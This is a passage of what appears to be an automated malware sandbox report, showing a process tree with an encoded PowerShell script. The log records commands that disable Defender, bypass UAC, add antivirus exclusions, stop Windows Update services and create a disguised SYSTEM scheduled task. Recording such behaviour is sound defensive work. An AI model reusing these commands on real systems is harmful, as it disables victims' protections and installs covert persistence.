        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
        5⤵
        
        PID:3524
      - C:\Windows\SysWOW64\sc.exe
        
        "C:\Windows\system32\sc.exe" qc windefend
        6⤵
        Launches sc.exe
        
        PID:5780
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
        6⤵
        
        PID:1984
      - C:\Windows\SysWOW64\whoami.exe
        
        "C:\Windows\system32\whoami.exe" /groups
        6⤵
        
        PID:4652
      - C:\Windows\SysWOW64\net1.exe
        
        "C:\Windows\system32\net1.exe" start TrustedInstaller
        6⤵
        
        PID:4108
      - C:\Windows\SysWOW64\net1.exe
        
        "C:\Windows\system32\net1.exe" start lsass
        6⤵
        
        PID:3040
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 2292
        5⤵
        Program crash
        
        PID:4676
- C:\Users\Admin\AppData\Local\Temp\1DBE.exe
  C:\Users\Admin\AppData\Local\Temp\1DBE.exe
  2⤵
  - Executes dropped EXE
  PID:3736
- - C:\Windows\system32\rundll32.exe
    C:\Windows\system32\rundll32.exe ccfaaaacef.sys,#1
    3⤵
    PID:1236
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe ccfaaaacef.sys,#1
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      PID:1048
- C:\Users\Admin\AppData\Local\Temp\261B.exe
  C:\Users\Admin\AppData\Local\Temp\261B.exe
  2⤵
  - Executes dropped EXE
  PID:2104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:4792
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:1680
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1112
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5976
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2892
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5988
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:5108
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5416
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:2196
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:2252
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:3248
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:2024
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:4152

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c regini "C:\Users\Admin\AppData\Roaming\random_1697964194.txt"
1⤵
- Suspicious use of WriteProcessMemory
PID:4116
- C:\Windows\system32\regini.exe
  regini "C:\Users\Admin\AppData\Roaming\random_1697964194.txt"
  2⤵
  PID:4080

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1152

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2408

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:384

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5156

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
